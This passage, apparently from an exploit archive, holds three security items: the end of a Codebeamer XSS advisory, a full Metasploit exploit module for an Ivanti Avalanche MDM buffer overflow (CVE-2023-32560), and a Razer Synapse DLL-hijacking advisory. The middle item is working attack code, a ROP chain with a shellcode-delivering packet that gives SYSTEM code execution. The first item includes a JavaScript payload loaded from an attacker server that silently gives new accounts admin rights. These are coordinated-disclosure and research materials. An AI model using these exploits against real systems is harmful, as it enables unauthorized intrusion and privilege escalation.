space before the equal sign in "window.x.src ='https://<ATTACKER_SERVER>/poc.js'"<br />is mandatory, as this section of the payload would otherwise be truncated to<br />"window.x." by the application, completely removing the URL of the attacker<br />server.<br /><br />When an admin user now clicks on this malicious link, an external JavaScript<br />file will be loaded (poc.js), which can be found below. The included<br />JavaScript code creates a hidden iframe which loads the page with the User<br />Registration settings. This page allows to specify, whether newly registered<br />accounts should get assigned to a certain group via multiple checkboxes to<br />choose from. The script now automatically selects the checkbox<br />"System Administrator", resulting in newly registered accounts having admin<br />privileges in the application. As this attack takes place in a hidden iframe,<br />the victim doesn't get any visual feedback that the attack is happening.<br /><br />Attack Sequence:<br />1. Send the malicious link to an administrator.<br />2. Wait for the administrator to click on the malicious link.<br />3. Register a new account with automatic admin privileges.<br /><br />Content of poc.js:<br />frame = document.createElement("iframe");<br />frame.addEventListener("load", function() {<br /> setTimeout(function(){<br /> frame.contentDocument.getElementById("roles1").click();<br /> frame.contentDocument.getElementById("notificationFrom").value = "example@sec-consult.com";<br /> frame.contentDocument.getElementById("notificationAddress").value = "example@sec-consult.com";<br /> frame.contentDocument.getElementsByClassName("actionBar")[0].childNodes[1].click();<br /> }, 2000)<br />});<br />frame.src = "http://<CODEBEAMER_SERVER>/sysadmin/configUserRegistration.spr";<br />frame.style="position: absolute;width:0;height:0;border:0;";<br />document.body.append(frame);<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following Codebeamer versions are affected by this vulnerability:<br /><=22.10-SP7, <=22.04-SP5, <=21.09-SP13<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2023-06-05: Sending the advisory to cvd@ptc.com<br />2023-06-05: Vendor confirms receipt of advisory.<br />2023-06-16: Vendor confirms vulnerability and mentions a fix in version "22.10-SP6".<br />2023-06-19: Informing the vendor that version "22.10-SP6" is still vulnerable.<br />2023-06-21: Vendor confirms that the vulnerability still exists in version<br /> "22.10-SP6" and that it's actually fixed in version "22.10-SP7".<br /> Furthermore, vendor asks if we're fine with a public disclosure via CISA.<br />2023-06-22: Informing vendor that public disclosure via CISA is fine.<br />2023-06-22: Vendor mentions that he contacts CISA and that he keeps us in loop.<br />2023-07-14: Asking vendor for a status update regarding CISA.<br />2023-07-14: Vendor requests access to CISA VINCE for a public disclosure.<br />2023-07-14: Access granted to CISA VINCE.<br />2023-08-01: Date of public disclosure set to 2023-08-29.<br />2023-08-29: Coordinated advisory release.<br /><br /><br />Solution:<br />---------<br />Update version "22.10-X" to "22.10-SP8" or later.<br />Update version "22.04-X" to "22.04-SP6" or later.<br />Update version "21.09-X" to "21.09-SP14" or later.<br /><br />The following URL was provided by the vendor with additional remediation information:<br />https://codebeamer.com/cb/wiki/31346480<br /><br /><br />Workaround:<br />-----------<br />No workaround available.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF N. Schilling / @2023<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::Tcp<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Ivanti Avalanche MDM Buffer Overflow',<br /> 'Description' => %q{<br /> This module exploits a buffer overflow condition in Ivanti Avalanche MDM versions before v6.4.1.<br /> An attacker can send a specially crafted message to the Wavelink Avalanche Manager,<br /> which could result in arbitrary code execution with the NT/AUTHORITY SYSTEM permissions.<br /> This vulnerability occurs during the processing of 3/5/8/100/101/102 item data types.<br /> The program tries to copy the item data using `qmemcopy` to a fixed size data buffer on stack.<br /> Upon successful exploitation the attacker gains full access to the target system.<br /><br /> This vulnerability has been tested against Ivanti Avalanche MDM v6.4.0.0 on Windows 10.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Ege BALCI egebalci[at]pm.me', # PoC & Msf Module<br /> 'A researcher at Tenable' # Discovery<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-32560'],<br /> ['URL', 'https://www.tenable.com/security/research/tra-2023-27'],<br /> ['URL', 'https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1']<br /> ],<br /> 'DefaultOptions' => {<br /> 'EXITFUNC' => 'thread'<br /> },<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_X86,<br /> 'Payload' => {<br /> 'BadChars' => "\x3b"<br /> },<br /> 'Targets' => [['Ivanti Avalanche <= v6.4.0.0', {}]],<br /> 'Privileged' => true,<br /> 'DisclosureDate' => '2023-08-14',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => []<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptPort.new('RPORT', [true, 'The remote Avalanche Manager port', 1777])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> begin<br /> connect<br /> rescue StandardError<br /> print_error('Could not connect to target!')<br /> return Exploit::CheckCode::Safe<br /> end<br /> res = sock.get_once<br /><br /> if res =~ /p\.guid/<br /> return Exploit::CheckCode::Appears<br /> else<br /> return Exploit::CheckCode::Safe<br /> end<br /> end<br /><br /> def exploit<br /> expected_payload_size = 622<br /><br /> # This is a custom ROP chain for bypassing DEP via VirtualAlloc<br /> rop_chain = [0x00544498].pack('V') # pop edx ; mov eax, 0x00000022 ; ret ;<br /> rop_chain += [0x00001000].pack('V') # flAllocationType<br /> rop_chain += [0x00499ac0].pack('V') # pop eax ; ret ;<br /> rop_chain += [0x0056a208].pack('V') # VirtualAlloc IAT entry<br /> rop_chain += [0x00566650].pack('V') # pop ecx ; ret ;<br /> rop_chain += [0x00000040].pack('V') # flProtect<br /> rop_chain += [0x0054b079].pack('V') # pop ebx ; ret ;<br /> rop_chain += [0x00000320].pack('V') # dwSize<br /> rop_chain += [0x00402323].pack('V') # pop ebp; ret<br /> rop_chain += [0x0055642a].pack('V') # pop eax; ret<br /> rop_chain += [0x0052ad90].pack('V') # pop esi; ret;<br /> rop_chain += [0x0042792f].pack('V') # jmp [eax]<br /> rop_chain += [0x00521907].pack('V') # pop edi ; ret ;<br /> rop_chain += [0x00568968].pack('V') # ret ;<br /> rop_chain += [0x004995ab].pack('V') # pushad ; ret ;<br /> rop_chain += [0x00499c20].pack('V') # push esp ; ret<br /><br /> # Because of the compiler optimized `qmemcpy`<br /> # we are not able to directly return to out smashed stack.<br /> # This buffer re-arranges the entire stack for escaping<br /> # the longass function without crashing.<br /> buf = Rex::Text.rand_text_alpha(136)<br /> buf += [0].pack('V') # set empty register<br /> buf += [0].pack('V') # set empty register<br /> buf += [0].pack('V') # stack alignment buffer<br /> buf += [0].pack('V') # stack alignment buffer<br /> buf += [0x00511a80].pack('V') # ESP -> $(rop: "add esp, 0x10 ; ret ;")<br /> buf += [0x00583900].pack('V') # .data section scratch space<br /> buf += [0x00583900].pack('V') # .data section scratch space<br /> buf += [0x00585858].pack('V') # .data section scratch space<br /> buf += [0x00585857].pack('V') # .data section scratch space<br /><br /> # ==================<br /> name1 = 'h.mid'<br /> value1 = "\x30"<br /><br /> name2 = 'h.cmd'<br /> value2 = "\x31\x39"<br /><br /> name3 = 'p.waitprofile'<br /> value3 = (buf + rop_chain + make_nops(expected_payload_size - payload.encoded.length) + payload.encoded)<br /><br /> item1 = [2].pack('N')<br /> item1 += [name1.length].pack('N')<br /> item1 += [value1.length].pack('N')<br /> item1 += name1 + value1<br /><br /> item2 = [2].pack('N')<br /> item2 += [name2.length].pack('N')<br /> item2 += [value2.length].pack('N')<br /> item2 += name2 + value2<br /><br /> item3 = [101].pack('N')<br /> item3 += [name3.length].pack('N')<br /> item3 += [value3.length].pack('N')<br /> item3 += name3 + value3<br /><br /> hp = item1 + item2 + item3<br /> if hp.length % 16 != 0 # Add padding if not power of 16<br /> hp += ("\x00" * (16 - (hp.length % 16)))<br /> end<br /><br /> preamble = [hp.length + 16].pack('N')<br /> preamble += [item1.length + item2.length].pack('N')<br /> preamble += [(hp.length + 16) - 0x3b].pack('N')<br /> preamble += [0].pack('N')<br /><br /> packet = preamble + hp<br /><br /> print_status('Connecting to target...')<br /> connect<br /> res = sock.get_once<br /> fail_with(Failure::UnexpectedReply, 'Could not connect to MDM service - no response') if res.nil?<br /><br /> print_status('Sending payload...')<br /> sock.put(packet)<br /> disconnect<br /> end<br />end<br /></code></pre>
<pre><code>Advisory ID: SYSS-2023-002<br />Product: Razer Synapse<br />Manufacturer: Razer Inc.<br />Affected Version(s): Versions before 3.8.0428.042117 (20230601)<br />Tested Version(s): 3.8.0228.022313 (20230315)<br /> under Windows 10 Pro (10.0.19044)<br /> under Windows 11 Home (10.0.22621)<br />Vulnerability Type: Improper Privilege Management (CWE-269)<br /> Time-of-check Time-of-use Race Condition <br />(CWE-367)<br />Risk Level: High<br />Solution Status: Fixed<br />Manufacturer Notification: 2023-03-23<br />Solution Date: 2023-04-28<br />Public Disclosure: 2023-08-31<br />CVE Reference: CVE-2022-47631<br />Author of Advisory: Dr. Oliver Schwarz, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />Razer Synapse is an additional driver software for Razer gaming devices.<br />The manufacturer describes the product as a "unified cloud-based<br />hardware configuration tool" (see [1]).<br /><br />Due to an unsafe installation path, improper privilege management, and a<br />time-of-check time-of-use race condition, the associated system service<br />"Razer Synapse Service" is vulnerable to DLL hijacking.<br />As a result, local Windows users can abuse the Razer driver installer to<br />obtain administrative privileges on Windows.<br /><br />In order to exploit the vulnerability, the attacker needs physical<br />access to the machine and needs to prepare the attack before Razer<br />Synapse is installed along with a Razer driver.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The attack scenario considers a Windows machine without any previous<br />installation of any Razer device or software.<br />The attacker has a local unprivileged Windows account, physical access<br />to the machine, and a device which is either a Razer peripheral or able<br />to pretend to be one (such as a Bash Bunny or a Raspberry Pi Zero).<br />The attacker aims at executing code with full system privileges.<br /><br />The attack exploits the Razer Synapse Service which runs with elevated<br />privileges. While the main binary of the service is stored in the<br />protected location "C:\Program Files (x86)\Razer\Synapse3\Service", it<br />dynamically loads libraries from<br />"C:\ProgramData\Razer\Synapse3\Service\bin".<br />Before the installation, standard users can write to this path, since<br />"C:\ProgramData" is world-writable on a standard installation of<br />Windows.<br /><br />The Synapse installation procedure changes access privileges, so that<br />standard users cannot write to the path any longer.<br />However, if the path is created before the driver installation, the<br />creator can set own files to be read-only and deny write access for<br />the SYSTEM user.<br /><br />Upon start, the Synapse service checks the location for foreign DLLs,<br />removes them, and aborts upon failure to delete them.<br />However, due to a time-of-check time-of-use race condition, attackers<br />can replace a benign DLL after it has been checked and before it is<br />loaded.<br /><br />Note that the described vulnerability is similar to CVE-2021-44226<br />(SYSS-2021-058) and CVE-2022-47632 (SYSS-2022-047), which Razer Inc.<br />fixed in March and September of 2022, respectively.<br />The new attack differs from the earlier ones in that the attacker<br />now has to exploit a race condition.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />The attack consists of the following steps:<br /><br />1. Before the installation of the driver/Synapse, the attacker creates<br /> "C:\ProgramData\Razer\Synapse3\Service\bin", copies a custom<br /> malicious version of userenv.dll into the directory, sets the DLL to<br /> read-only, and denies write access for SYSTEM.<br /><br />2. Afterwards, the attacker triggers the installation of Synapse.<br /> This can be done without any elevated privileges by plugging in a<br /> Razer device and following the installation procedure for Synapse<br /> if device-specific co-installers are not disabled.<br /> Alternatively, a device such as Bash Bunny or a Raspberry Pi Zero<br /> can be used and pretend to be a Razer device.<br /><br />3. With the help of a script, the attacker monitors the installation<br /> progress. As soon as legitimate DLL files show up in the directory,<br /> the attacker temporarily overwrites the malicious DLL with a<br /> legitimate one, waits for the DLL to be assessed (i.e., read), and<br /> then quickly copies back the malicious content to the DLL before it<br /> is actually loaded and executed.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />Razer has published a patched version that will be deployed automatically<br />upon driver installation on current Windows builds.<br /><br />To prevent similar attacks through other co-installers, system<br />administrators can disable them by setting the following key in the<br />Windows registry:<br />HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device <br />Installer\DisableCoInstallers = 1<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2022-12-19: Vulnerability discovered<br />2023-03-23: Vulnerability reported to manufacturer<br />2023-04-28: Patch released by manufacturer<br />2023-08-31: Public disclosure of vulnerability<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for Razer Synapse 3<br /> https://www2.razer.com/eu-en/synapse-3<br />[2] SySS Security Advisory SYSS-2023-002<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-002.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[4] SySS Proof of Concept Video<br /> https://youtu.be/0myDcqmtt0U<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Dr. Oliver Schwarz of SySS GmbH.<br /><br />E-Mail: oliver.schwarz@syss.de<br />Public Key: <br />https://www.syss.de/fileadmin/dokumente/PGPKeys/Oliver_Schwarz.asc<br />Key ID: 0x9716294F1294280D<br />Key Fingerprint: D452 B014 E992 2886 E799 6B43 9716 294F 1294 280D<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS Web<br />site.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: https://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>